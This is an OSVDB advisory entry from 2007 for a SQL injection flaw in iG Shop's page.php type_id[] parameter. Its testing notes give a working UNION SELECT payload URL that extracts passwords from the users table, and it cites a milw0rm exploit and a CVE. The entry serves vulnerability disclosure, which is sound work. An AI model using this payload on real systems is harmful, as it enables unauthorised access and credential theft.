iG Shop shop/page.php type_id[] Variable SQL Injection

2007-05-12T00:00:00
ID OSVDB:37910
Type osvdb
Reporter OSVDB
Modified 2007-05-12T00:00:00

Description

Manual Testing Notes

http://[target]/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union//select//password//from//users/*

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/3907 CVE-2007-2717 Bugtraq ID: 23949